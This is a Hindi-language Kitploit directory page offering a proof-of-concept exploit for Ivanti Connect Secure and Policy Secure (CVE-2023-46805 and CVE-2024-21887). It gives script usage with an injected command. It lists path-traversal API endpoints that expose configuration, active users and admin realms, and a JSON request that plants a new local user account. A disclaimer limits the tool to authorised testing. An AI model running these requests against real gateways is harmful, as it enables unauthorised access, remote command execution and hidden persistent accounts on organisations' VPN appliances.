Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46805_CVE-2024-21887 — Ivanti ICS 9.x, 22.x और Ivanti Policy Secure के वेब घटक में एक प्रमाणीकरण बाईपास कमजोरी एक दूरस्थ हमलावर को नियंत्रण जांचों को बाईपास करके प्रतिबंधित संसाधनों तक पहुंचने की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/duy-31/cve-2023-46805_cve-2024-21887
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubduy-31/cve-2023-46805_cve-2024-21887

CVE-2023-46805_CVE-2024-21887

Ivanti ICS 9.x, 22.x और Ivanti Policy Secure के वेब घटक में एक प्रमाणीकरण बाईपास कमजोरी एक दूरस्थ हमलावर को नियंत्रण जांचों को बाईपास करके प्रतिबंधित संसाधनों तक पहुंचने की अनुमति देती है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
23432 साल पहलेKitploit द्वारा समीक्षित

CVE-2023-46805

Ivanti ICS 9.x, 22.x और Ivanti Policy Secure के वेब घटक में एक प्रमाणीकरण बाईपास भेद्यता, जो एक दूरस्थ हमलावर को नियंत्रण जांचों को बायपास करके प्रतिबंधित संसाधनों तक पहुंचने की अनुमति देती है।

उपयोग: ./CVE-2023-46805.sh http(s)://fqdn:port
./CVE-2023-46805.sh https://my.vpn.ip:443

image

नोट्स: chmod +x CVE-2023-46805.sh
एप्लिकेशन curl + json_pp की आवश्यकता है

परिणाम यदि असुरक्षित है, तो आपको कुछ चीज़ें देखनी चाहिए:

image

CVE-2024-21887

Ivanti Connect Secure (9.x, 22.x) और Ivanti Policy Secure के वेब घटकों में एक कमांड इंजेक्शन भेद्यता, जो एक प्रमाणित प्रशासक को विशेष रूप से तैयार अनुरोध भेजने और उपकरण पर मनमाने कमांड निष्पादित करने की अनुमति देती है।

  • poc चलाएं (यह 2 प्रवेश बिंदुओं का प्रयास करेगा)

उपयोग: ./CVE-2024-21887.sh http(s)://fqdn:port payload_cmd
./CVE-2024-21887.sh https://my.vpn.ip:443 "touch /tmp/pwned"

परिणाम यदि असुरक्षित है, तो आपको कुछ चीज़ें देखनी चाहिए और आपका पेलोड काम करना चाहिए: image

नोट्स: chmod +x CVE-2024-21887.sh
एप्लिकेशन curl, xxd, tr & sed की आवश्यकता है

महत्वपूर्ण जानकारी

/api/v1/totp/user-backup-code/../../configuration/system/configuration /api/v1/totp/user-backup-code/../../system/active-users

/api/v1/totp/user-backup-code/../../configuration/administrators/admin-realms/realm/Admin%20Users

-खाता बनाएं /authentication/auth-servers/authserver/System%20Local/local/users/user

-H 'Content-Type:application/json' -d '{"change-password-at-signin": "false", "consoleaccess": "false", "enabled": "true", "fullname": "new user", "one-timeuse": "false", "password-cleartext": "new_password", "username": "login_user"}'



कार्य-समाधान/सुधार: https://forums.ivanti.com/s/article/CVE-2023-46805-Authentication-Bypass-CVE-2024-21887-Command-Injection-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure-Gateways?language=en_US

श्रेय: https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis


मेरे बारे में और अधिक ;) https://www.linkedin.com/in/duy-huan-bui/

⚠️ अस्वीकरण: महत्वपूर्ण: यह स्क्रिप्ट केवल शैक्षिक, नैतिक परीक्षण और कानूनी उपयोग के लिए प्रदान की गई है। इसका उपयोग किसी भी सिस्टम या नेटवर्क पर स्पष्ट अनुमति के बिना न करें। कंप्यूटर सिस्टम और नेटवर्क तक अनधिकृत पहुंच अवैध है, और अनधिकृत गतिविधियाँ करते पकड़े जाने वाले उपयोगकर्ता कानूनी कार्रवाई के अधीन हैं। लेखक इस स्क्रिप्ट के दुरुपयोग से होने वाली किसी भी क्षति के लिए जिम्मेदार नहीं है।

टूल डाउनलोड करें